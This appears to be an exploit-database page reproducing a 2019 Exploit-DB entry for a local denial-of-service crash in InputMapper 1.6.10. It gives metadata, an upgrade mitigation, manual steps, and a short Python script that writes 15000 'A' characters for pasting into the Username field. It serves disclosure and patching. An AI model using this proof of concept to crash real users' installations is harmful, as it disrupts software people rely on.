header-logo
Suggest Exploit
vendor:
InputMapper
by:
elkoyote07
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: InputMapper
Affected Version From: 1.6.10
Affected Version To: 1.6.10
Patch Exists: YES
Related CWE: N/A
CPE: inputmapper
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 x64
2019

InputMapper < 1.6.10 Local Denial of Service

InputMapper is vulnerable to a local denial of service attack. By copying a string of 15000 'A's into the Username field and double-clicking on it, the application will crash.

Mitigation:

Upgrade to the latest version of InputMapper
Source

Exploit-DB raw data:

# Exploit Title: InputMapper < 1.6.10 Local Denial of Service
# Date: 20.09.2019
# Vendor Homepage: https://inputmapper.com/
# Software Link: https://inputmapper.com/downloads/category/2-input-mapper
# Exploit Author: elkoyote07
# Tested Version: 1.6.10
# Tested on: Windows 10 x64


# 1.- Start Input Mapper
# 2.- Click on Guest (Top left)
# 3.- Click on Login
# 3.- Copy the content of exploit.txt in the Username field
# 4.- Once copied double-click on Username field
# 5.- Happy crash :)




#!/usr/bin/python

t = "A" * 15000

try:
f=open("exploit.txt","w")
f.write(t)
f.close()
print "Done"
except:
print "Error"

Navigation

Suggest Exploit

Services By CQR